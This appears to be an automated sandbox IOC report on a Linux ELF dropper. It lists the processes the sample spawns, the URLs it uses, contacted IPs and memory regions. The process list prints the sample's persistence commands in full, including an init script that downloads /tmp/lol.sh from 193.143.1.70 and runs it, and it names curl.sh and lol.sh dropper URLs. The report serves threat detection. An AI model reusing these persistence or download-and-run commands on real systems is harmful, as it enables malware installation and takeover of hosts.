Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/x86_64.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/x86_64.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/system

/tmp/x86_64.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/system /etc/rcS.d/S99system

/tmp/x86_64.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

/tmp/x86_64.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/sh

/tmp/x86_64.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/x86_64.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/sh /etc/rc.d/S99sh

/tmp/x86_64.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/sbin/gdm3

/etc/gdm3/PrimeOff/Default

/usr/sbin/gdm3

/etc/gdm3/PrimeOff/Default

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 45 hidden processes, click here to show them.

URLs

Name

Malicious

http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi

unknown

Details

Name:	http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_64.nn.elf
Source:	x86_64.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://193.143.1.70/curl.sh

unknown

Details

Name:	http://193.143.1.70/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_64.nn.elf
Source:	x86_64.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/lol.sh

unknown

Details

Name:	http://193.143.1.70/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_64.nn.elf
Source:	x86_64.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/

unknown

Details

Name:	http://193.143.1.70/
TargetID:	-1
From Memory:	true
Source:	x86_64.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.38.dr, bootcmd.12.dr, custom.service.12.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

137.164.138.235

unknown

United States

109.1.163.119

unknown

France

78.224.43.111

unknown

France

1.26.32.206

unknown

China

182.238.36.110

unknown

China

59.3.183.111

unknown

Korea Republic of

217.51.37.30

unknown

Germany

193.79.151.114

unknown

Netherlands

94.21.158.128

unknown

Hungary

46.15.66.253

unknown

Norway

167.220.155.31

unknown

United States

54.39.233.41

unknown

Canada

131.188.102.188

unknown

Germany

1.246.194.95

unknown

Korea Republic of

15.104.22.156

unknown

United States

188.123.72.165

unknown

France

91.65.168.240

unknown

Germany

68.11.108.28

unknown

United States

48.188.147.212

unknown

United States

113.59.125.169

unknown

China

86.190.106.186

unknown

United Kingdom

119.204.215.143

unknown

Korea Republic of

211.82.85.140

unknown

China

117.115.98.17

unknown

China

132.227.215.44

unknown

France

113.103.88.49

unknown

China

175.134.80.28

unknown

Japan

145.195.93.67

unknown

Netherlands

15.18.73.98

unknown

United States

193.203.61.226

unknown

Russian Federation

218.53.195.252

unknown

Korea Republic of

123.56.55.131

unknown

China

75.192.110.199

unknown

United States

207.13.171.98

unknown

United States

121.240.15.121

unknown

India

113.235.186.62

unknown

China

182.5.214.63

unknown

Indonesia

106.192.181.236

unknown

India

194.205.35.15

unknown

United Kingdom

177.148.141.181

unknown

Brazil

192.91.70.213

unknown

United States

115.157.236.81

unknown

China

105.47.224.148

unknown

Egypt

120.253.198.247

unknown

China

175.54.159.69

unknown

China

104.143.85.253

unknown

United States

214.165.139.16

unknown

United States

27.85.31.148

unknown

Japan

98.121.168.116

unknown

United States

214.169.138.49

unknown

United States

153.168.137.177

unknown

Japan

141.54.229.91

unknown

Germany

205.66.221.154

unknown

United States

177.72.0.63

unknown

Brazil

185.67.114.232

unknown

Spain

56.19.77.242

unknown

United States

175.223.107.88

unknown

Korea Republic of

43.234.132.40

unknown

Japan

151.63.175.63

unknown

Italy

113.164.17.185

unknown

Viet Nam

13.43.35.69

unknown

United States

111.12.128.254

unknown

China

132.199.99.101

unknown

Germany

191.108.252.145

unknown

Colombia

82.112.69.195

unknown

Iceland

139.91.107.121

unknown

Greece

1.8.81.73

unknown

China

149.5.189.217

unknown

United States

221.18.110.44

unknown

Japan

149.184.69.23

unknown

United Kingdom

61.212.90.169

unknown

Japan

93.74.6.76

unknown

Ukraine

110.104.251.70

unknown

China

78.107.21.100

unknown

Russian Federation

159.250.40.144

unknown

United States

41.32.137.48

unknown

Egypt

195.57.57.189

unknown

Spain

70.164.70.197

unknown

United States

190.126.18.246

unknown

Colombia

27.167.35.185

unknown

Korea Republic of

201.34.104.24

unknown

Brazil

23.249.65.173

unknown

United States

43.251.49.3

unknown

Japan

190.89.240.250

unknown

167.180.104.132

unknown

United States

57.154.105.141

unknown

Belgium

117.108.7.169

unknown

Japan

180.134.69.159

unknown

Korea Republic of

41.157.187.167

unknown

South Africa

89.127.163.219

unknown

Ireland

19.124.20.213

unknown

United States

13.164.123.201

unknown

United States

91.4.16.208

unknown

Germany

104.139.146.85

unknown

United States

2.75.223.82

unknown

Kazakhstan

126.206.144.212

unknown

Japan

155.213.106.67

unknown

United States

119.231.146.63

unknown

Japan

187.230.100.178

unknown

Mexico

33.235.41.232

unknown

United States

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

419000

page execute read

419000

page execute read

7ffeb37af000

page read and write

51c000

page read and write

51a000

page read and write

20d4000

page read and write

7ffeb37f0000

page execute read

20d4000

page read and write

7ffeb37af000

page read and write

7ffeb37f0000

page execute read

51c000

page read and write

20d9000

page read and write

51a000

page read and write

There are 3 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
x86_64.nn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportx86_64.nn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
x86_64.nn.elf